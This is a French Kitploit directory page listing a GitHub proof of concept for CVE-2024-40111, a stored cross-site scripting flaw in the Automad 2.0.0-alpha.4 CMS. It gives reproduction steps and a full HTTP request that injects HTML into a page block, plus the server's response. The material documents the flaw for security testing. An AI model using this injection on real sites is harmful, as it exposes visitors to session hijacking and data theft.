Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-40111-Exploit — Exploit pour : CVE-2024-40111 : Cross-Site Scripting (XSS) stocké dans Automad 2.0.0-alpha.4 | Kitploit
Outils/GitHubGitHub/theexploiters/cve-2024-40111-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubtheexploiters/cve-2024-40111-exploit

CVE-2024-40111-Exploit

Exploit pour : CVE-2024-40111 : Cross-Site Scripting (XSS) stocké dans Automad 2.0.0-alpha.4

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-40111 : Cross-Site Scripting (XSS) stocké dans Automad 2.0.0-alpha.4

Détails de l'exploit

  • Titre de l'exploit : Cross-Site Scripting (XSS) stocké dans Automad 2.0.0-alpha.4
  • Date : 2024-06-20
  • Auteur de l'exploit : Jerry Thomas (w3bn00b3r)
  • Page d'accueil du fournisseur : Automad
  • Lien du logiciel : Dépôt GitHub d'Automad
  • Catégorie : Application Web [CMS à fichiers plats]
  • Version : 2.0.0-alpha.4
  • Testé sur : Docker version 26.1.4, Debian GNU/Linux 11 (bullseye)

Description

Une vulnérabilité de cross-site scripting (XSS) persistant (stocké) a été identifiée dans Automad 2.0.0-alpha.4. Cette vulnérabilité permet aux attaquants d'injecter du code JavaScript malveillant dans le corps du modèle, qui est stocké dans le CMS. Le code injecté est exécuté dans le navigateur de tout utilisateur visitant la page concernée, ce qui peut potentiellement conduire à un détournement de session, un vol de données et d'autres activités malveillantes.

Preuve de concept

Étapes pour reproduire

  1. Connexion : Connectez-vous en tant qu'administrateur et accédez au point de terminaison http://localhost/dashboard/home.

  2. Modifier la page de bienvenue : Modifiez la page de bienvenue par défaut.

  3. Accéder à l'onglet Contenu : Allez sur http://localhost/dashboard/page?url=%2F&section=text et modifiez le bloc nommé Main.

  4. Injecter la charge utile : Saisissez la charge utile XSS suivante :

    root@kitploit:~

Requête

root@kitploit:~
POST /_api/page/data HTTP/1.1
Host: localhost
Content-Length: 1822
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv
Accept: */*
Origin: http://localhost
Referer: http://localhost/dashboard/page?url=%2F&section=text
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb
Connection: close

------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__csrf__"

49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1
------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__json__"

{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS identified by Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}
------WebKitFormBoundaryzHmXQBdtZsTYQYCv--

Réponse

root@kitploit:~
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Thu, 20 Jun 2024 19:17:35 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/8.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 30

{"code":200,"time":1718911055}
  1. Déclencher le XSS : La charge utile XSS se déclenche lors de la visite de la page d'accueil http://localhost/.

Compteur de vues du dépôt

Télécharger l’outil